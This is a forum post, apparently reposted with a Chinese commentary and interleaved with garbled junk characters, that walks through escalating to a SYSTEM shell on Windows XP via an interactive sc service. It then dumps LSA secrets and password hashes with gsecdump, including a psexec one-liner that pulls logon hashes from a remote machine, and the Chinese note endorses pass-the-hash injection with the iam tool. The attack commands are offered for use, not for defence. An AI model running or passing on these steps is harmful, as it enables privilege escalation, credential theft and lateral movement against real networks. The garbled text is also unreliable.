o get a DOS Prompt as NT system:
* T" \0 I8 _% {2 |" s7 u b4 }& M( ] R* M1 F
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
9 d' N2 N# `) Y, Y, j[SC] CreateService SUCCESS3 A; V2 E1 y% L9 h5 f* ? ?! u
& n2 C; ~" Q" l: mC:\>sc start shellcmdline
& u* w8 I0 X" f/ Q% O[SC] StartService FAILED 1053:
3 w( m9 Q. ]5 x! h: V/ e# J4 M/ U6 [( d2 p) C
The service did not respond to the start or control request in a timely fashion. t4 |: ]1 }6 `
' l* n% M h6 Q+ f/ ?
C:\>sc delete shellcmdline1 h* }" G6 q6 S0 ~2 v8 c5 Y" p
[SC] DeleteService SUCCESS! g O$ o1 g' Y8 X9 |3 A8 E
m0 u; E# @7 h# m, W3 }
------------3 q7 x2 w' t' P! N* t% v0 p5 h8 U9 L
: [+ K0 o! M5 G5 ^1 D$ b( @+ w
Then in the new DOS window:
% h$ f; B' G4 j% [+ j% c
; W4 |7 |, Z5 R, N/ |, ]7 z2 fMicrosoft Windows XP [Version 5.1.2600]; d* d( ]% `' `$ E* ~' X: N
(C) Copyright 1985-2001 Microsoft Corp., k- {) v8 B; K* g
. o% u* L& V- rC:\WINDOWS\system32>whoami- z4 D; |+ X: s- Q2 { j5 C" i
NT AUTHORITY\SYSTEM
% p4 W" m4 [# l( X7 X8 `
* L" M" q9 ~! l$ E* qC:\WINDOWS\system32>gsecdump -h7 V! i! V3 c$ y: g- Y0 v; {1 B. @
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se), D+ K8 y1 |6 M7 G% Y2 \2 |
usage: gsecdump [options]1 u; `$ D' H$ O) X# l" ^$ [& b
1 u5 |# ?. i7 S6 p$ u) f; M& L' t
options:# [9 x, p/ m- t$ q0 W, N
-h [ --help ] show help
( e: {/ t) P, {8 u1 ~# {+ \-a [ --dump_all ] dump all secrets
* Z3 k- Q& S3 }! Z! g0 Q-l [ --dump_lsa ] dump lsa secrets' E2 {+ r/ p/ `3 A" v _
-w [ --dump_wireless ] dump microsoft wireless connections$ N1 ~5 o, A, G7 k& D$ c
-u [ --dump_usedhashes ] dump hashes from active logon sessions
5 p# p9 u/ L! g- S6 f3 ^4 c3 v-s [ --dump_hashes ] dump hashes from SAM/AD
4 I- `0 R" N8 B7 N2 n' }. f2 k& o/ }) ~' ~5 t: \
Although I like to use:
0 q) p: h4 m6 b
- C( `0 k, q/ }# Z" }/ N- YPsExec v1.83 - Execute processes remotely7 I1 f( z$ }# y2 c9 e! z. Q
Copyright (C) 2001-2007 Mark Russinovich4 e' ^5 t! @% ~, Y- u
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
: e* J' I2 n! d2 x' t* v' M/ N9 L+ N3 z% u
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT9 B8 B: h8 ]6 }% L) p2 h% n
1 X+ \' b( e/ N" l
to get the hashes from active logon sessions of a remote system." X' y( i- {1 |4 n
/ M) A' ]* z" j. g8 h
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.4 B4 F, u a4 _* R0 j' h6 b6 s! s
1 a) {' {5 o/ O提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
' T' M& {7 y* Z! i: U2 D# H- E原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]+ \- W( E* j% L6 t5 W. I
1 s. e/ m/ t2 n6 O9 Z2 d我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。8 M1 X9 e+ M5 o* }
|